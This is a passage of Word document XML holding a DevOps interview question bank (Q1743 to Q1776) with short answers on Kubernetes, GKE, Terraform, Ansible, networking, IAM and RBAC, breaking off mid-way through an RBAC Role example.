        <w:tab/>
        <w:t>ReplicaSet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintains desired pod count</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Developer creates Docker container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pushes image to registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Kubernetes pulls image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Creates Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Exposes app using Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Automatically scales and heals app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Auto-scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Self-healing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service discovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure abstraction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multi-cloud support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>Imagine running an e-commerce app with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Frontend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backend APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Payment service</w:t>
        <w:br/>
        <w:t>Kubernetes can:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run all services independently</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restart failed services automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scale backend during high traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Update apps without downtime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Kubernetes Commands</w:t>
        <w:br/>
        <w:t>kubectl get pods</w:t>
        <w:br/>
        <w:t>kubectl get nodes</w:t>
        <w:br/>
        <w:t>kubectl apply -f deployment.yaml</w:t>
        <w:br/>
        <w:t>kubectl describe pod mypod</w:t>
        <w:br/>
        <w:t>kubectl logs mypod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview One-Liner</w:t>
        <w:br/>
        <w:t>Kubernetes is an open-source container orchestration platform that automates deployment, scaling, networking, and management of containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1743. What is a Pod in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Pod is the smallest deployable unit in Kubernetes - one or more tightly coupled containers that share the same network namespace, IP address, and storage volumes, and are always scheduled together on the same node.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1744. What is a Node in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Node is a single worker machine (physical or virtual) in a Kubernetes cluster that runs Pods, managed by the kubelet agent and container runtime, with cluster-wide scheduling handled by the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1745. What is a Kubernetes namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A namespace is a virtual partition within a Kubernetes cluster that scopes resource names and access controls, letting multiple teams or environments share one cluster without naming collisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1746. What is a Kubernetes Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment is a Kubernetes controller that manages a ReplicaSet of Pods, handling declarative rollouts, rolling updates, and rollbacks so you describe the desired state and Kubernetes reconciles the actual state to match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1747. What is a Kubernetes Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Service is a stable network endpoint (a fixed IP and DNS name) that load-balances traffic to a dynamic set of Pods matching a label selector, so clients don't need to track individual Pod IPs that change as Pods are created or destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1748. How do you upgrade/update a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: You upgrade the control plane first (in GKE this is largely managed - you trigger or schedule it via gcloud/console), then upgrade node pools afterward, typically one pool at a time using a surge or rolling upgrade strategy so new nodes with the newer kubelet version are added and old nodes are cordoned, drained, and removed gradually. Always check the Kubernetes version skew policy (control plane can be at most a few minor versions ahead of kubelets) and review deprecated/removed API versions in the target release before upgrading, since workloads using removed APIs will break.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1749. How does the GKE API server (control plane) expose traffic, and how do clients reach it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In GKE, Google manages the control plane (API server, etcd, scheduler, controller-manager) on Google-owned infrastructure and exposes the API server through a public or private endpoint (configurable) fronted by a load balancer with TLS; kubectl and other clients authenticate via IAM-backed credentials/tokens and reach the API server over that endpoint, while node-to-control-plane and pod-to-API-server traffic within the cluster is routed over the VPC (using Konnectivity/tunnels for private clusters where nodes have no public IPs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1750. What is etcd, and what happens to the cluster if etcd goes down?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: etcd is the distributed, consistent key-value store that holds the entire Kubernetes cluster's state - every object (Pods, Deployments, Secrets, ConfigMaps) is persisted there, and the API server reads/writes through it. If etcd goes down, the cluster effectively becomes read-only or fully unavailable for changes: existing Pods keep running (kubelets continue managing already-scheduled workloads), but no new scheduling, updates, or API writes can succeed until etcd recovers, which is why etcd is run as a highly-available odd-numbered cluster (typically 3 or 5 members) with regular snapshots for disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1751. What does OOMKilled mean, and how do you fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OOMKilled means a container was terminated by the kernel's OOM (Out Of Memory) killer because it exceeded its configured memory limit (or the node ran out of memory). Fix it by profiling actual memory usage and raising the container's memory limit to a realistic value, fixing a memory leak in the application if usage grows unbounded over time, or reducing the workload's memory footprint (batch size, cache size) - simply raising the limit without checking for a leak just delays the same crash at a higher memory ceiling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1752. What happens when a Kubernetes node fails and goes NotReady?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kubelet on that node stops sending heartbeats to the API server, and after the node-monitor-grace-period (default 40s) the node is marked NotReady; after a further pod-eviction-timeout (default 5 minutes) the control plane considers the node's Pods unreachable and, for Pods owned by a Deployment/ReplicaSet, reschedules replacements onto healthy nodes to restore the desired replica count - Pods not managed by a controller (bare Pods) are not automatically rescheduled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1753. What happens to the Horizontal Pod Autoscaler (HPA) if the metrics server goes down during a traffic spike?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The HPA controller can no longer fetch current CPU/memory (or custom) metrics, so it stops making any new scaling decisions - up or down - and holds at the last known replica count, logging a 'FailedGetResourceMetric' or similar event, until the metrics server recovers and fresh metrics are available again. This means a traffic spike during a metrics-server outage gets no autoscaling response at all, which is why metrics-server itself needs to be monitored and highly available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1754. What are taints and tolerations in Kubernetes, in one line?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A taint is applied to a node to repel Pods from scheduling there unless they explicitly tolerate it, and a toleration is applied to a Pod to allow (not force) scheduling onto nodes with a matching taint - together they let you reserve nodes for specific workloads (e.g. GPU or dedicated node pools).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1755. How is a Kubernetes cluster monitored - what tools and approach would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The standard stack is Prometheus scraping metrics from kube-state-metrics (object-level state like Pod status and Deployment replicas), node-exporter (host-level CPU/memory/disk), and application /metrics endpoints, with Grafana for dashboards and Alertmanager for routing alerts. On GKE, Cloud Monitoring/Cloud Logging provide this out of the box with Managed Service for Prometheus as an option. Layer in centralized logging (Cloud Logging or the ELK/EFK stack) and distributed tracing (OpenTelemetry) so you can correlate metrics, logs, and traces when diagnosing an issue rather than relying on any single signal alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1756. Kubernetes shows a Deployment as healthy and all Pods Running, but Grafana is alerting that the application isn't working properly - how do you investigate and fix this mismatch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: This gap almost always means Kubernetes' liveness/readiness checks are too shallow to catch the real problem, so start by checking what those probes actually test (often just 'process is up', not 'app is functionally correct'). Then check application-level signals Kubernetes doesn't see: error rate and latency in app logs/traces, dependency health (database, downstream API, cache) that the app can't self-report through a basic health check, and whether the alert is a false positive from a misconfigured Grafana query or threshold. Fix at two levels - make the liveness/readiness probes actually reflect real health (a /ready endpoint that checks DB connectivity, not just 'server started'), and fix the root cause found in logs/traces (bad config, downstream outage, resource starvation not yet triggering a Pod restart). If the app is silently degraded but not crashing, add or tighten SLO-based alerts (latency/error-rate) so Kubernetes' pass/fail Pod status stops being the only signal you trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1757. What is a Helm chart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Helm chart is a packaged, templated collection of Kubernetes manifests (Deployments, Services, ConfigMaps, etc.) that can be parameterized with values and installed, upgraded, or rolled back as a single versioned release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1758. What is Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform is an infrastructure-as-code tool used to define and provision cloud and platform resources with declarative configuration. It manages resources through providers, state files, plans, and applies.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>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Q1759. What is a Terraform state file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The state file is Terraform's record of the real-world resources it currently manages and their attributes, used to compute the diff between desired configuration and actual infrastructure on every plan/apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1760. What is Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible is an agentless, push-based configuration management and automation tool that connects over SSH to apply YAML-defined playbooks, configuring servers or orchestrating multi-step deployments without installing any software on the target hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1761. How does Ansible help in DevOps and infrastructure automation, in practical terms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible replaces manual, error-prone server setup with repeatable playbooks - the same playbook configures 1 server or 1,000 identically, eliminates configuration drift by re-applying desired state, and turns operational runbooks (patching, deployments, failover) into version-controlled, peer-reviewed code. In a DevOps pipeline it's commonly used to provision and configure servers after Terraform creates them, orchestrate zero-downtime rolling deployments, and enforce security baselines consistently across an entire fleet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1762. What is an Ansible playbook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A playbook is a YAML file describing an ordered list of plays and tasks - each naming an Ansible module and its parameters - that define the desired state to apply to a group of hosts from the inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1763. What is a role in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A role is a standardized directory structure that packages related tasks, variables, templates, handlers, and files for one piece of functionality (like 'install nginx'), so it can be reused across multiple playbooks instead of duplicating the same tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1764. What is a task in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A task is the smallest unit of work in a playbook - a single call to an Ansible module with specific parameters, like installing a package or copying a file, executed in order against the targeted hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1765. What is an ad-hoc command in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An ad-hoc command is a one-off Ansible module call run directly from the command line (e.g. `ansible all -m ping` or `ansible webservers -m service -a "name=nginx state=restarted"`) for quick, single-purpose actions that don't need a full playbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1766. What is the Ansible template module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The template module copies a Jinja2 template file to a remote host, rendering any variables and expressions in it first, so you can generate host-specific config files (like nginx.conf) from a single templated source instead of maintaining a separate static file per host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1767. What is idempotency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means repeating an operation has the same effect as performing it once. It is essential for safe retries, payment APIs, event processing, and deployment automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Idempotency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Q1768. How would you optimize a Google Cloud Run service that is taking a long time to start (cold starts)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set a minimum instance count so warm instances are always ready instead of scaling to zero, reduce container image size and simplify startup (lazy-load heavy dependencies, avoid unnecessary initialization work at boot), enable CPU always-allocated if the workload needs background processing, tune concurrency so fewer cold instances are needed under load, and use a smaller/leaner base image (distroless or slim) so the container starts faster. If cold starts are still an issue for latency-sensitive paths, keep min-instances above zero permanently for that service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1769. What is a load balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A load balancer distributes incoming network traffic across multiple backend servers or instances, improving availability and throughput and removing any single instance as a point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1770. What is DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DNS translates human-readable domain names into IP addresses and other records. It is critical for service discovery, internet routing, email delivery, and application availability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DNS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Q1771. What is a firewall?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A firewall is a network security control that inspects and filters incoming and outgoing traffic based on rules (source/destination IP, port, protocol), blocking traffic that doesn't match an allowed rule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1772. What is a subnet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A subnet is a smaller, segmented range of IP addresses carved out of a VPC's larger address space, typically used to separate resources by tier (public-facing vs. private) or by availability zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1773. In simple terms, how does network traffic flow from a client to a Pod in GKE (client to Load Balancer to Service to Pod)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A client request hits an external Load Balancer (provisioned via a Kubernetes Ingress or Service of type LoadBalancer), which forwards it to a node in the cluster; kube-proxy's routing rules on that node (or the LB directly, with container-native load balancing) send the request to a Pod matching the Service's label selector, using the Service's stable virtual IP as the indirection layer so the client never needs to know individual Pod IPs, which change as Pods are created and destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1774. What is VPC Peering, and how does it differ from Cloud Interconnect and Partner Interconnect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC Peering connects two VPC networks (in the same or different projects/organizations) directly over Google's internal network using private IPs, with no gateway or extra latency, but it doesn't transitively route through a third peered network. Cloud Interconnect and Partner Interconnect instead connect your on-premises network to Google Cloud - Dedicated Interconnect is a direct physical connection into a Google colocation facility, while Partner Interconnect goes through a supported service provider for locations without direct physical access - both used for hybrid cloud connectivity rather than VPC-to-VPC peering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1775. What is IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IAM (Identity and Access Management) is the system that controls who (users, service accounts, applications) can do what (which actions) on which resources, typically through roles and policies that follow least-privilege principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1776. What is RBAC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC (Role-Based Access Control) in Kubernetes is a security mechanism that controls who can do what inside a cluster based on roles.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>RBAC answers: “Who is allowed to perform which actions on which resources?”</w:t>
        <w:br/>
        <w:t>It is used to enforce fine-grained access control in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why RBAC is needed</w:t>
        <w:br/>
        <w:t>In a cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Many users and applications exist</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not everyone should have full access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security must follow least privilege principle</w:t>
        <w:br/>
        <w:t>RBAC ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only authorized users/pods can perform actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive resources are protected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Main components of RBAC</w:t>
        <w:br/>
        <w:t>1. Role</w:t>
        <w:br/>
        <w:t>Defines permissions within a namespace</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can read pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can list services</w:t>
        <w:br/>
        <w:t>kind: Role</w:t>
        <w:br/>
        <w:t>rules:</w:t>
        <w:br/>
        <w:t>- apiGroups: [""]</w:t>
        <w:br/>
